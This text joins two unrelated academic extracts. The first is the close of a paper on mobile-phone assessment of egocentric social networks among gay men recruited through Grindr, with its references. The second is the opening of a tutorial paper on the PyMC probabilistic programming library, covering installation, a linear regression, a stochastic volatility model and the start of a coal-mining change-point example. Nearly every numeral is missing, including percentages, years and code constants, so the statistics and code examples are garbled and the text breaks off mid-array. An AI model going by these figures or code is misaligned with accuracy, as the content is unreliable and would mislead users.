sensitive information during a survey, especially on an electronic device. few concerns were voiced by participants in our study. online recruitment may be unethical in populations were a language barrier is present, and online consent forms may be easy to click through without understanding the content. despite the technological savvy of our population, three main limitations remained with our study design. approximately half of the eligible gay men who clicked through our grindr banner ad and initiated the online forms, completed the study participation forms ( %; n = / ; figure ). this percentage is similar to initial participation rates that were found in another study that recruited gay men through grindr and asked them to fill out a one-time online survey ( %; n = / ; rendina et al., ). a big difference between rendina et al. ( ) and our study is that they retained % of the initial gay men in their analysis sample. we retained egos ( %) in our study. increasing rates of online recruitment offers potential participants a smorgasbord of studies to select from. moreover, there is less buy-in when shopping amongst online studies. for example, rapport may be established with a recruiter during recruitment in a clinic. online recruitment may be best suited for studies offering instant participation. recruitment through grindr reached gay men with risky sexual behavior profiles as intended; nineteen percent of interviewed gay men reported anonymous / one-time sex partners in their network during the telephone interview (n = of ). yet only one of the ( %) enrolled gay men had reported anonymous partners. though not statistically significant, this percentage drop suggests that an online forum that attracts users with a targeted behavior is not necessarily a good recruitment source. another limitation was our restriction of phone- log data collection to android users. in our study, the majority of participants were iphone users, e.g. % of egos and % of alters who filled out online forms. iphone users tend to have other iphone users as friends (canright, ). android and iphone users also tend to have different demographic and social characteristics (albanesius, ). phone log-based inference that is based on one type of mobile phone is likely to miss a connections insna.org | volume | issue | december mobile phone assessment in egocentric networks segment of the population and be biased. text message- based assessment that that does not require a smartphone may be a better option in other populations. lastly, lengthy assessments may call for larger computer screens and human interaction to encourage compliance. our mobile assessment could be taken in a few minutes. questions contained a few response categories and mostly fit on one screen. this may partly explain high compliance in our study (a median of days of reporting). the benefits and challenges in our study support a marriage of traditional and new data collection methods that is likely to remain in social network research. visual web interfaces that allow participants to construct their own personal networks through a self-administered social network inventory have met with limited success; an interviewer may still be necessary (matzat & snijders, ). moreover, one mode of electronic communication may not adequately capture social interaction (quintane & kleinbaum, ). that is why we assessed the frequency of ego-alter contacts through self-report and mobile communication. despite the challenges of incorporating new technologies into research, the social dynamics of mobile devices and social media are difficult to ignore. it is hard to fully understand the dynamics of health-related behaviors without them. references albanesius, c. ( ). infographic: what does the average android, ios user look like? pcmag. com. accessed october , . http://www. pcmag.com/article / , , , .asp. barrera jr., m., & gottlieb, b.h. ( ). social support in the adjustment of pregnant adolescents: assessment issues. in: gottlieb, b.h. (ed.), social networks and social support. sage publications, beverly hills, ca, pp. – . canright, g. ( ). who cares what kind of smartphone their friends have? conference presentation, international network for social network analysts, sunbelt xxxiii, may - , hamburg, germany. centers for disease control and prevention. ( ). http://www.cdc.gov/hrqol/hrqol _measure. htm. comulada, w.s., rotheram-borus, m.j., pequegnat, w., weiss, r.e., desmond, k.a., arnold, e.m., remien, r.h., morin, s.f., weinhardt, l.s., johnson, m.o., & chesney, m.a. ( ). relationships over time between mental health symptoms and transmission risk among persons living with hiv. psychology of addictive behaviors, , - . doi: . /a . comulada, w.s., muth, s.q., & latkin, c.a. ( ). the analysis of multiple ties in longitudinal egocentric network data: a case study on bidirectional relationships between trust and drug use. social networks, , - . fowler, j.h., & christakis, n.a. ( ). dynamic spread of happiness in a large social network: longitudinal analysis over years in the framingham heart study. british medical journal, , a . doi: . /bmj.a . freedman, m.j., lester, k.m., mcnamara, c., milby, j.b., & schumacher, j.e. ( ). cell phones for ecological momentary assessment with cocaine- addicted homeless patients in treatment. journal of substance abuse treatment, , - . fulkerson, j.a., nelson, m.c., lytle, l.a., moe, s., heitzler, c., & pasch, k.e. ( ). the validation of a home food inventory. international journal of behavioral nutrition and physical activity, , . hall, jeffrey, a. ( ). parents’ networks: egocentric networks and unique and shared sources of social support. connections, , - . heckathorn, d.d. ( ). respondent driven sampling: a new approach to the study of hidden populations. social problems, , - . heckathorn, d.d. ( ). respondent-driven sampling ii: deriving valid population estimates from chain-referral samples of hidden populations. social problems, , - . hedeker, d., mermelstein, r.j., & demirtas, h. ( ). an application of a mixed-effects location scale model for analysis of ecological momentary assessment (ema) data. biometrics, , - . hedeker, d., demirtas, h., & mermelstein, r. j. ( ). a mixed ordinal location scale model for analysis of ecological momentary assessment (ema) data. statistics and its interface, , - . heron, k.e., & smyth, j.m. ( ). ecological momentary interventions: incorporating mobile technology into psychosocial and health behaviour treatments. br j health psychol, (pt ), – . doi.org/ . / x . kaiser, l.l., megar-quiñonez, h., townsend, m.s., nicholson, y., fujii, m.l., martin, a.c., & lamp, c.l. ( ). food insecurity and food supplies in latino households with young children. journal of nutrition education and behavior, , - . connections december | issue | volume | insna.org mobile phone assessment in egocentric networks kissinger, p., rice, j., farley, t., trim, s., jewitt, k., margavio, v., & martin, d.h. ( ). application of computer-assisted interviews to sexual behavior research. american journal of epidemiology, , - . lazer, d., pentland, a(s)., adamic, l., aral, s., barabasi, a.l., brewer, d., christakis, n., contractor, n., fowler, j., gutmann, m., jebara, t., king, g., macy, m., roy, d., & van alstyne, m. ( ). life in the network: the coming age of computational social science. science, ( ), - . doi: . /science. . le roux, i.m., tomlinson, m., harwood, j.m., o’connor, m.j., worthman, c.m., mbewu, n., stewart, j., hartley, m., swendeman, d., comulada, w.s., weiss, r.e., & rotheram-borus, m.j. ( ). outcomes of home visits for pregnant mothers and their infants: a cluster randomized controlled trial. aids, , – . matzat, u., & snijders, c. ( ). the quality of ego- centered social network data in web surveys: experiments with a visual elicitation method. conference presentation, international network for social network analysts, sunbelt xxxiii, may - , hamburg, germany. onnela, j.p, saramäki, j., hyvönen, j., szabó, g., lazer, d., kaski, k., kertész, j., & barabási, a.-l. ( ). structure and tie strengths in mobile communication networks. proceedings of the national academy of sciences, ( ), - . quintane, e., & kleinbaum, a.m. ( ). matter over mind? e-mail data and the measurement of social networks. connections, ( ), - . ramanathan, n., swendeman, d., comulada, w.s., estrin, d., & rotheram-borus, m.j. ( ). identifying preferences for mobile health applications for self-monitoring and self-management: focus group findings from hiv-positive persons and young mothers. international journal of medical informatics, , e - . doi: . /j. ijmedinf. . . . rice, e., comulada, s., green, s., arnold, e.m., & rotheram-borus, m.j. ( ). differential disclosure across social network ties among women living with hiv. aids and behavior, , - . shiffman, s., stone, a.a., & hufford, m.r. ( ). ecological momentary assessment. annu rev clin psychol, , - . sisk, c., sharkey, j.r., mcintosh, w.a., & anding, j. ( ). using multiple household food inventories to measure food availability in the home over days: a pilot study. nutrition journal, , . doi: . / - - - . snijders, t., spreen, m., & zwaagstra, r. ( ). the use of multilevel modeling for analysing personal networks: networks of cocaine users in an urban area. journal of quantitative anthropology, , - . stone, a.a., & shiffman, s. ( ). ecological momentary assessment in behavioral medicine. annals of behavioral medicine, , - . stone, a. a., shiffman, s., schwartz, j. e., broderick, j. e., & hufford, m. r. ( ). patient non- compliance with paper diaries. bmj, , - . stone, a. a., shiffman, s., schwartz, j. e., broderick, j. e., & hufford, m. r. ( ). patient compliance with paper and electronic diaries. controlled clinical trials, , - . swendeman, d., comulada, w.s., ramanathan, n., lazar, m, & estrin, d. reliability and validity of daily self-monitoring by smartphone application for health-related quality of life, antiretroviral adherence, substance use, and sexual behaviors among people living with hiv. . ( ). aids & behavior, epub ahead of print. valente, t.w. ( ). social networks and health: models, methods, and applications. new york: oxford university press. pp. - . valente, t.w. ( ). network interventions. science, , - . walls, t.a., & shafer, j.l. ( ). models for intensive longitudinal data. oxford university press. yang, c., latkin, c., muth, s.q., & rudolph, a. ( ). injection drug users’ involvement in drug economy: dynamics of sociometric and egocentric social networks. connections, , - . ye, q., zhu, t., hu, d., wu, b., du, n., & wang, b. ( ). cell phone mini challenge award: social network accuracy – exploring temporal communication in mobile call graphs. ieee symposium on visual analytics science and technology, october - , columbus, ohio, usa. doi: . / vast. . . zhang, h., & dantu, r. ( ). predicting social ties in mobile phone networks. intelligence and security informatics (isi), may - , vancouver, bc, canada. doi: . /isi. . . submitted september accepted march published april corresponding author thomas v. wiecki, thomas.wiecki@gmail.com academic editor charles elkan additional information and declarations can be found on page doi . /peerj-cs. copyright salvatier et al. distributed under creative commons cc-by . open access probabilistic programming in python using pymc john salvatier , thomas v. wiecki and christopher fonnesbeck ai impacts, berkeley, ca, united states quantopian inc, boston, ma, united states department of biostatistics, vanderbilt university, nashville, tn, united states abstract probabilistic programming allows for automatic bayesian inference on user-defined probabilistic models. recent advances in markov chain monte carlo (mcmc) sampling allow inference on increasingly complex models. this class of mcmc, known as hamiltonian monte carlo, requires gradient information which is often not readily available. pymc is a new open source probabilistic programming framework written in python that uses theano to compute gradients via automatic differentiation as well as compile probabilistic programs on-the-fly to c for increased speed. contrary to other probabilistic programming languages, pymc allows model specification directly in python code. the lack of a domain specific language allows for great flexibility and direct interaction with the model. this paper is a tutorial-style introduction to this software package. subjects data mining and machine learning, data science, scientific computing and simulation keywords bayesian statistic, probabilistic programming, python, markov chain monte carlo, statistical modeling introduction probabilistic programming (pp) allows for flexible specification and fitting of bayesian statistical models. pymc is a new, open-source pp framework with an intuitive and readable, yet powerful, syntax that is close to the natural syntax statisticians use to describe models. it features next-generation markov chain monte carlo (mcmc) sampling algorithms such as the no-u-turn sampler (nuts) (hoffman & gelman, ), a self-tuning variant of hamiltonian monte carlo (hmc) (duane et al., ). this class of samplers works well on high dimensional and complex posterior distributions and allows many complex models to be fit without specialized knowledge about fitting algorithms. hmc and nuts take advantage of gradient information from the likelihood to achieve much faster convergence than traditional sampling methods, especially for larger models. nuts also has several self-tuning strategies for adaptively setting the tuneable parameters of hamiltonian monte carlo, which means specialized knowledge about how the algorithms work is not required. pymc , stan (stan development team, ), and the laplacesdemon package for r are currently the only pp packages to offer hmc. a number of probabilistic programming languages and systems have emerged over the past – decades. one of the earliest to enjoy widespread usage was the bugs language (spiegelhalter et al., ), which allows for the easy specification of bayesian how to cite this article salvatier et al. ( ), probabilistic programming in python using pymc . peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:thomas.wiecki@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. models, and fitting them via markov chain monte carlo methods. newer, more expressive languages have allowed for the creation of factor graphs and probabilistic graphical models. each of these systems are domain-specific languages built on top of existing low- level languages; notable examples include church (goodman et al., ) (derived from scheme), anglican (wood, van de meent & mansinghka, ) (integrated with clojure and compiled with a java virtual machine), venture (mansinghka, selsam & perov, ) (built from c++), infer.net (minka et al., ) (built upon the .net framework), figaro (pfeffer, ) (embedded into scala), webppl (goodman & stuhlmüller, ) (embedded into javascript), picture (kulkarni et al., ) (embedded into julia), and quicksand (ritchie, ) (embedded into lua). probabilistic programming in python (python software foundation, ) confers a number of advantages including multi-platform compatibility, an expressive yet clean and readable syntax, easy integration with other scientific libraries, and extensibility via c, c++, fortran or cython (behnel et al., ). these features make it straightforward to write and use custom statistical distributions, samplers and transformation functions, as required by bayesian analysis. while most of pymc ’s user-facing features are written in pure python, it leverages theano (bergstra et al., ; bastien et al., ) to transparently transcode models to c and compile them to machine code, thereby boosting performance. theano is a library that allows expressions to be defined using generalized vector data structures called tensors, which are tightly integrated with the popular numpy (van der walt, colbert, varoquaux, ) ndarray data structure, and similarly allow for broadcasting and advanced indexing, just as numpy arrays do. theano also automatically optimizes the likelihood’s computational graph for speed and provides simple gpu integration. here, we present a primer on the use of pymc for solving general bayesian statistical inference and prediction problems. we will first describe basic pymc usage, including installation, data creation, model definition, model fitting and posterior analysis. we will then employ two case studies to illustrate how to define and fit more sophisticated models. finally we will show how pymc can be extended and discuss more advanced features, such as the generalized linear models (glm) subpackage, custom distributions, custom transformations and alternative storage backends. installation running pymc requires a working python interpreter (python software foundation, ), either version . (or more recent) or . (or more recent); we recommend that new users install version . . a complete python installation for mac osx, linux and windows can most easily be obtained by downloading and installing the free anacondapythondistribution by continuumio. pymc can be installed using ‘pip‘: pip install git+https://github.com/pymc-devs/pymc pymc depends on several third-party python packages which will be automatically installed when installing via pip. the four required dependencies are: theano, numpy, salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://store.continuum.io/cshop/anaconda/ http://dx.doi.org/ . /peerj-cs. scipy, and matplotlib. to take full advantage of pymc , the optional dependencies pandas and patsy should also be installed. pip install patsy pandas the source code for pymc is hosted on github at https://github.com/pymc- devs/pymc and is distributed under the liberal apachelicense . . on the github site, users may also report bugs and other issues, as well as contribute code to the project, which we actively encourage. comprehensive documentation is readily available at http://pymc-devs.github.io/pymc /. a motivating example: linear regression to introduce model definition, fitting and posterior analysis, we first consider a simple bayesian linear regression model with normal priors on the parameters. we are interested in predicting outcomes y as normally-distributed observations with an expected value µ that is a linear function of two predictor variables, x and x . y ∼n(µ,σ ) µ=α+β x +β x where α is the intercept, and βi is the coefficient for covariate xi, while σ represents the observation or measurement error. we will apply zero-mean normal priors with variance of to both regression coefficients, which corresponds to weak information regarding the true parameter values. since variances must be positive, we will also choose a half-normal distribution (normal distribution bounded below at zero) as the prior for σ . α∼n( , ) βi∼n( , ) σ ∼|n( , )|. generating data we can simulate some data from this model using numpy’s random module, and then use pymc to try to recover the corresponding parameters. the following code implements this simulation, and the resulting data are shown in fig. : import numpy as np import matplotlib.pyplot as plt # intialize random number generator np.random.seed( ) # true parameter values alpha, sigma = , beta = [ , . ] salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/pymc-devs/pymc https://github.com/pymc-devs/pymc https://github.com/pymc-devs/pymc /blob/master/license http://pymc-devs.github.io/pymc / http://dx.doi.org/ . /peerj-cs. figure simulated regression data. # size of dataset size = # predictor variable x = np.linspace( , , size) x = np.linspace( ,. , size) # simulate outcome variable y = alpha + beta[ ]*x + beta[ ]*x + np.random.randn(size)*sigma model specification specifying this model in pymc is straightforward because the syntax is similar to the statistical notation. for the most part, each line of python code corresponds to a line in the model notation above. first, we import the components we will need from pymc . from pymc import model, normal, halfnormal the following code implements the model in pymc: basic_model = model() with basic_model: # priors for unknown model parameters alpha = normal(’alpha’, mu= , sd= ) beta = normal(’beta’, mu= , sd= , shape= ) sigma = halfnormal(’sigma’, sd= ) # expected value of outcome mu = alpha + beta[ ]*x + beta[ ]*x salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. # likelihood (sampling distribution) of observations y_obs = normal(’y_obs’, mu=mu, sd=sigma, observed=y) the first line, basic_model = model() creates a new model object which is a container for the model random variables. following instantiation of the model, the subsequent specification of the model components is performed inside a with statement: with basic_model: this creates a context manager, with our basic_model as the context, that includes all statements until the indented block ends. this means all pymc objects introduced in the indented code block below the with statement are added to the model behind the scenes. absent this context manager idiom, we would be forced to manually associate each of the variables with basic_model as they are created, which would result in more verbose code. if you try to create a new random variable outside of a model context manger, it will raise an error since there is no obvious model for the variable to be added to. the first three statements in the context manager create stochastic random variables with normal prior distributions for the regression coefficients, and a half-normal distribution for the standard deviation of the observations, σ . alpha = normal(’alpha’, mu= , sd= ) beta = normal(’beta’, mu= , sd= , shape= ) sigma = halfnormal(’sigma’, sd= ) these are stochastic because their values are partly determined by its parents in the dependency graph of random variables, which for priors are simple constants, and are partly random, according to the specified probability distribution. the normal constructor creates a normal random variable to use as a prior. the first argument for random variable constructors is always the name of the variable, which should almost always match the name of the python variable being assigned to, since it can be used to retrieve the variable from the model when summarizing output. the remaining required arguments for a stochastic object are the parameters, which in the case of the normal distribution are the mean mu and the standard deviation sd, which we assign hyperparameter values for the model. in general, a distribution’s parameters are values that determine the location, shape or scale of the random variable, depending on the parameterization of the distribution. most commonly used distributions, such as beta, exponential, categorical, gamma, binomial and others, are available as pymc objects, and do not need to be manually coded by the user. the beta variable has an additional shape argument to denote it as a vector-valued parameter of size . the shape argument is available for all distributions and specifies the length or shape of the random variable; when unspecified, it defaults to a value of one (i.e., a scalar). it can be an integer to specify an array, or a tuple to specify a multidimensional salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. array. for example, shape=( , ) makes random variable that takes a by matrix as its value. detailed notes about distributions, sampling methods and other pymc functions are available via the help function. help(normal) help on class normal in module pymc .distributions.continuous: class normal(pymc .distributions.distribution.continuous) | normal log-likelihood. | | .. math:: ight\} | | parameters | ---------- | mu : float | mean of the distribution. | tau : float | precision of the distribution, which corresponds to | :math:‘ /\sigma^ ‘ (tau > ). | sd : float | standard deviation of the distribution. alternative parameterization. | | .. note:: | - :math:‘e(x) = \mu‘ | - :math:‘var(x) = / \tau‘ having defined the priors, the next statement creates the expected value mu of the outcomes, specifying the linear relationship: mu = alpha + beta[ ]*x + beta[ ]*x this creates a deterministic random variable, which implies that its value is completely determined by its parents’ values. that is, there is no uncertainty in the variable beyond that which is inherent in the parents’ values. here, mu is just the sum of the intercept alpha and the two products of the coefficients in beta and the predictor variables, whatever their current values may be. pymc random variables and data can be arbitrarily added, subtracted, divided, or multiplied together, as well as indexed (extracting a subset of values) to create new random variables. many common mathematical functions like sum, sin, exp and linear algebra functions like dot (for inner product) and inv (for inverse) are also provided. applying operators and functions to pymc objects results in tremendous model expressivity. the final line of the model defines y_obs, the sampling distribution of the response data. y_obs = normal(’y_obs’, mu=mu, sd=sigma, observed=y) this is a special case of a stochastic variable that we call an observed stochastic, and it is the data likelihood of the model. it is identical to a standard stochastic, except that salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. its observed argument, which passes the data to the variable, indicates that the values for this variable were observed, and should not be changed by any fitting algorithm applied to the model. the data can be passed in the form of either a numpy.ndarray or pandas.dataframe object. notice that, unlike the prior distributions, the parameters for the normal distribution of y_obs are not fixed values, but rather are the deterministic object mu and the stochastic sigma. this creates parent-child relationships between the likelihood and these two variables, as part of the directed acyclic graph of the model. model fitting having completely specified our model, the next step is to obtain posterior estimates for the unknown variables in the model. ideally, we could derive the posterior estimates analytically, but for most non-trivial models this is not feasible. we will consider two approaches, whose appropriateness depends on the structure of the model and the goals of the analysis: finding the maximum a posteriori (map) point using optimization methods, and computing summaries based on samples drawn from the posterior distribution using mcmc sampling methods. maximum a posteriori methods the maximum a posteriori (map) estimate for a model, is the mode of the posterior distribution and is generally found using numerical optimization methods. this is often fast and easy to do, but only gives a point estimate for the parameters and can be misleading if the mode isn’t representative of the distribution. pymc provides this functionality with the find_map function. below we find the map for our original model. the map is returned as a parameter point, which is always represented by a python dictionary of variable names to numpy arrays of parameter values. from pymc import find_map map_estimate = find_map(model=basic_model) print(map_estimate) {‘alpha’: array( . ), ‘beta’: array([ . , . ]), ‘sigma_log’: array( . )} by default, find_map uses the broyden–fletcher–goldfarb–shanno (bfgs) optimization algorithm to find the maximum of the log-posterior but also allows selection of other optimization algorithms from the scipy.optimize module. for example, below we use powell’s method to find the map. from scipy import optimize salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. map_estimate = find_map(model=basic_model, fmin=optimize.fmin_powell) print(map_estimate) {’alpha’: array( . ), ’beta’: array([ . , . ]), ’sigma_log’: array( . )} it is important to note that the map estimate is not always reasonable, especially if the mode is at an extreme. this can be a subtle issue; with high dimensional posteriors, one can have areas of extremely high density but low total probability because the volume is very small. this will often occur in hierarchical models with the variance parameter for the random effect. if the individual group means are all the same, the posterior will have near infinite density if the scale parameter for the group means is almost zero, even though the probability of such a small scale parameter will be small since the group means must be extremely close together. also, most techniques for finding the map estimate only find a local optimium (which is often good enough), and can therefore fail badly for multimodal posteriors if the different modes are meaningfully different. sampling methods though finding the map is a fast and easy way of obtaining parameter estimates of well-behaved models, it is limited because there is no associated estimate of uncertainty produced with the map estimates. instead, a simulation-based approach such as mcmc can be used to obtain a markov chain of values that, given the satisfaction of certain conditions, are indistinguishable from samples from the posterior distribution. to conduct mcmc sampling to generate posterior samples in pymc , we specify a step method object that corresponds to a single iteration of a particular mcmc algorithm, such as metropolis, slice sampling, or the no-u-turn sampler (nuts). pymc ’s step_methods submodule contains the following samplers: nuts, metropolis, slice, hamiltonianmc, and binarymetropolis. gradient-based sampling methods pymc implements several standard sampling algorithms, such as adaptive metropolis- hastings and adaptive slice sampling, but pymc ’s most capable step method is the no-u-turn sampler. nuts is especially useful for sampling from models that have many continuous parameters, a situation where older mcmc algorithms work very slowly. it takes advantage of information about where regions of higher probability are, based on the gradient of the log posterior-density. this helps it achieve dramatically faster convergence on large problems than traditional sampling methods achieve. pymc relies on theano to analytically compute model gradients via automatic differentiation of the posterior density. nuts also has several self-tuning strategies for adaptively setting the tunable parameters of hamiltonian monte carlo. for random variables that are undifferentiable (namely, discrete variables) nuts cannot be used, but it may still be used on the differentiable variables in a model that contains undifferentiable variables. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. nuts requires a scaling matrix parameter, which is analogous to the variance parameter for the jump proposal distribution in metropolis-hastings, although nuts uses it somewhat differently. the matrix gives an approximate shape of the posterior distribution, so that nuts does not make jumps that are too large in some directions and too small in other directions. it is important to set this scaling parameter to a reasonable value to facilitate efficient sampling. this is especially true for models that have many unobserved stochastic random variables or models with highly non-normal posterior distributions. poor scaling parameters will slow down nuts significantly, sometimes almost stopping it completely. a reasonable starting point for sampling can also be important for efficient sampling, but not as often. fortunately, nuts can often make good guesses for the scaling parameters. if you pass a point in parameter space (as a dictionary of variable names to parameter values, the same format as returned by find_map) to nuts, it will look at the local curvature of the log posterior-density (the diagonal of the hessian matrix) at that point to guess values for a good scaling vector, which can result in a good value. the map estimate is often a good point to use to initiate sampling. it is also possible to supply your own vector or scaling matrix to nuts. additionally, the find_hessian or find_hessian_diag functions can be used to modify a hessian at a specific point to be used as the scaling matrix or vector. here, we will use nuts to sample draws from the posterior using the map as the starting and scaling point. sampling must also be performed inside the context of the model. from pymc import nuts, sample with basic_model: # obtain starting values via map start = find_map(fmin=optimize.fmin_powell) # instantiate sampler step = nuts(scaling=start) # draw posterior samples trace = sample( , step, start=start) [----------------- %-----------------] of complete in . sec the sample function runs the step method(s) passed to it for the given number of iterations and returns a trace object containing the samples collected, in the order they were collected. the trace object can be queried in a similar way to a dict containing a map from variable names to numpy.arrays. the first dimension of the array is the sampling index and the later dimensions match the shape of the variable. we can extract the last values for the alpha variable as follows trace[’alpha’][- :] salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. array([ . , . , . , . , . ]) posterior analysis pymc provides plotting and summarization functions for inspecting the sampling output. a simple posterior plot can be created using traceplot, its output is shown in fig. . from pymc import traceplot traceplot(trace) the left column consists of a smoothed histogram (using kernel density estimation) of the marginal posteriors of each stochastic random variable while the right column contains the samples of the markov chain plotted in sequential order. the beta variable, being vector-valued, produces two histograms and two sample traces, corresponding to both predictor coefficients. for a tabular summary, the summary function provides a text-based output of common posterior statistics: from pymc import summary summary(trace[’alpha’]) alpha: mean sd mc error % hpd interval ------------------------------------------------------------------- . . . [ . , . ] posterior quantiles: . . |--------------|==============|==============|--------------| . . . . . case study : stochastic volatility we present a case study of stochastic volatility, time varying stock market volatility, to illustrate pymc ’s capability for addressing more realistic problems. the distribution of market returns is highly non-normal, which makes sampling the volatilities significantly more difficult. this example has + parameters so using older sampling algorithms like metropolis-hastings would be inefficient, generating highly auto-correlated samples with a low effective sample size. instead, we use nuts, which is dramatically more efficient. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . . . . . . . . . . . . . . fr eq ue nc y alpha . . . . . . . . . s am pl e va lu e alpha . . . . . . . . . . . . . . . . . . . . fr eq ue nc y beta . . . . . . . . . . s am pl e va lu e beta . . . . . . . fr eq ue nc y sigma_log . . . . . . . s am pl e va lu e sigma_log . . . . . . . . fr eq ue nc y sigma . . . . . . . . s am pl e va lu e sigma figure kernel density estimates and simulated trace for each variable in the linear regression model. the model asset prices have time-varying volatility (variance of day over day returns). in some periods, returns are highly variable, while in others they are very stable. stochastic volatility models address this with a latent volatility variable, which is allowed to change over time. the following model is similar to the one described in the nuts paper (hoffman & gelman, , p. ). σ ∼exp( ) ν∼exp(. ) si∼n(si− ,σ− ) log(yi)∼t(ν, ,exp(− si)). here, y is the response variable, a daily return series which we model with a student-t distribution having an unknown degrees of freedom parameter, and a scale parameter determined by a latent process s. the individual si are the individual daily log volatilities in the latent log volatility process. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure historical daily returns of the s&p during the financial crisis. the data our data consist of daily returns of the s&p during the financial crisis. import pandas as pd returns = pd.read_csv(’data/sp .csv’, index_col= , parse_dates=true) see fig. for a plot of the daily returns data. as can be seen, stock market volatility increased remarkably during the financial crisis. model implementation as with the linear regression example, implementing the model in pymc mirrors its statistical specification. this model employs several new distributions: the exponential distribution for the ν and σ priors, the student-t (studentt) distribution for distribution of returns, and the gaussianrandomwalk for the prior for the latent volatilities. in pymc , variables with positive support like exponential are transformed with a log transform, making sampling more robust. behind the scenes, the variable is transformed to the unconstrained space (named ‘‘variablename_log’’) and added to the model for sampling. in this model this happens behind the scenes for both the degrees of freedom, nu, and the scale parameter for the volatility process, sigma, since they both have exponential priors. variables with priors that are constrained on both sides, like beta or uniform, are also transformed to be unconstrained, here with a log odds transform. although (unlike model specification in pymc ) we do not typically provide starting points for variables at the model specification stage, it is possible to provide an initial value for any distribution (called a ‘‘test value’’ in theano) using the testval argument. this overrides the default test value for the distribution (usually the mean, median or mode of salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the distribution), and is most often useful if some values are invalid and we want to ensure we select a valid one. the test values for the distributions are also used as a starting point for sampling and optimization by default, though this is easily overriden. the vector of latent volatilities s is given a prior distribution by a gaussianrandomwalk object. as its name suggests, gaussianrandomwalk is a vector-valued distribution where the values of the vector form a random normal walk of length n, as specified by the shape argument. the scale of the innovations of the random walk, sigma, is specified in terms of the precision of the normally distributed innovations and can be a scalar or vector. from pymc import exponential, studentt, exp, deterministic from pymc .distributions.timeseries import gaussianrandomwalk with model() as sp _model: nu = exponential(’nu’, ./ , testval= .) sigma = exponential(’sigma’, ./. , testval=. ) s = gaussianrandomwalk(’s’, sigma**- , shape=len(returns)) volatility_process = deterministic(’volatility_process’, exp(- *s)) r = studentt(’r’, nu, lam= /volatility_process, observed=returns[’s&p ’]) notice that we transform the log volatility process s into the volatility process by exp(- *s). here, exp is a theano function, rather than the corresponding function in numpy; theano provides a large subset of the mathematical functions that numpy does. also note that we have declared the model name sp _model in the first occurrence of the context manager, rather than splitting it into two lines, as we did for the first example. fitting before we draw samples from the posterior, it is prudent to find a decent starting value, by which we mean a point of relatively high probability. for this model, the full maximum a posteriori (map) point over all variables is degenerate and has infinite density. but, if we fix log_sigma and nu it is no longer degenerate, so we find the map with respect only to the volatility process s keeping log_sigma and nu constant at their default values (remember that we set testval=. for sigma). we use the limited-memory bfgs (l-bfgs) optimizer, which is provided by the scipy.optimize package, as it is more efficient for high dimensional functions; this model includes stochastic random variables (mostly from s). as a sampling strategy, we execute a short initial run to locate a volume of high probability, then start again at the new starting point to obtain a sample that can be used for inference. trace[- ] gives us the last point in the sampling trace. nuts will recalculate the scaling parameters based on the new point, and in this case it leads to faster sampling due to better scaling. import scipy with sp _model: salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . . . fr eq ue nc y nu s am pl e va lu e nu . . . . . . . . fr eq ue nc y sigma . . . . . . . . s am pl e va lu e sigma figure posterior samples of degrees of freedom (nu) and scale (sigma) parameters of the stochastic volatility model. each plotted line repre- sents a single independent chain sampled in parallel. start = find_map(vars=[s], fmin=scipy.optimize.fmin_l_bfgs_b) step = nuts(scaling=start) trace = sample( , step, progressbar=false) # start next run at the last sampled position. step = nuts(scaling=trace[- ], gamma=. ) trace = sample( , step, start=trace[- ], progressbar=false, njobs= ) notice that the call to sample includes an optional njobs= argument, which enables the parallel sampling of chains (assuming that we have processors available). we can check our samples by looking at the traceplot for nu and sigma; each parallel chain will be plotted within the same set of axes (fig. ). traceplot(trace, [nu, sigma]); finally we plot the distribution of volatility paths by plotting many of our sampled volatility paths on the same graph (fig. ). each is rendered partially transparent (via the alpha argument in matplotlib’s plot function) so the regions where many paths overlap are shaded more darkly. fig, ax = plt.subplots(figsize=( , )) returns.plot(ax=ax) ax.plot(returns.index, /np.exp(trace[’s’,:: ].t), ’r’, alpha=. ); ax.set(title=’volatility_process’, xlabel=’time’, ylabel=’volatility’); ax.legend([’s&p ’, ’stochastic volatility process’]) as you can see, the model correctly infers the increase in volatility during the financial crash. it is worth emphasizing the complexity of this model due to its high dimensionality and dependency-structure in the random walk distribution. nuts as implemented in pymc , however, correctly infers the posterior distribution with ease. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. feb apr jun aug oc t de c feb apr jun aug time . . . . . . . vo la til ity volatility_process s&p stochastic volatility process figure posterior plot of volatility paths (red), alongside market data (blue). figure recorded counts of coal mining disasters in the uk, – . case study : coal mining disasters this case study implements a change-point model for a time series of recorded coal mining disasters in the uk from to (jarrett, ). the annual number of disasters is thought to have been affected by changes in safety regulations during this period, as can be seen in fig. . we have also included a pair of years with missing data, identified as missing by a numpy maskedarray using - as a sentinel value. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. our objective is to estimate when the change occurred, in the presence of missing data, using multiple step methods to allow us to fit a model that includes both discrete and continuous random variables. disaster_data = np.ma.masked_values([ , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , - , , , , , , , , , , , , , , 